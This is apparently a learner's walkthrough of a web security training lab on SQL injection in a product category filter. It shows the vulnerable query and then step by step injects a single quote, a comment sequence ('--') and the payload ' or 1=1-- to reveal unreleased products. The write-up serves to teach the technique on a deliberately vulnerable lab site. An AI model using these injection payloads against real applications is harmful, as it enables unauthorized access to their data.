Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
This lab contains an SQL injection vulnerability in the product category filter. When the user selects a category, the application carries out an SQL query like the following:
SELECT * FROM products WHERE category = ‘Gifts’ AND released = 1
To solve the lab, perform an SQL injection attack that causes the application to display details of all products in any category, both released and unreleased.
First, let’s click on a category.
After clicking on the corporate gifts category, the URL shows:
https://ac321f581f89aa2e808a3eb200d10094.web-security-academy.net/filter?category=Corporate+giftsNotice the bold words, which are the query string.
The application will make a SQL query to retrieve information from the database:
SELECT * FROM products WHERE category = 'Corporate gifts' AND released = 1The objective is to retrieve all products info, from all category, and both released and unreleased products.
The above statement shows released = 1 meaning it will only show products that are released, where released = 0 represents unreleased.
Next if i add a single quote at the end of the query string:
?category=Corporate+gifts'
In the SQL query:
SELECT * FROM products WHERE category = 'Corporate gifts'' AND released = 1This will cause an error, as there is one single quote that is not closed.
Next, I add a double dash:
?category=Corporate+gifts'--
In the query string:
SELECT * FROM products WHERE category = 'Corporate gifts'--' AND released = 1Anything after the -- will be treated as comments in sql.
Meaning now the website should be showing all products of category, Corporate gifts, both released and unreleased. Notice that there is an additional item called Folding Gadgets.
To fully show everything on the database:
?category=Corporate+gifts' or 1=1--
In query string:
SELECT * FROM products WHERE category = 'Corporate gifts' or 1=1--' AND released = 1Now with the above query it will return all products when the category is either Coporate gifts or 1=1 , since 1=1 is always true, it will return all items.
Your lab should be solved at this point.
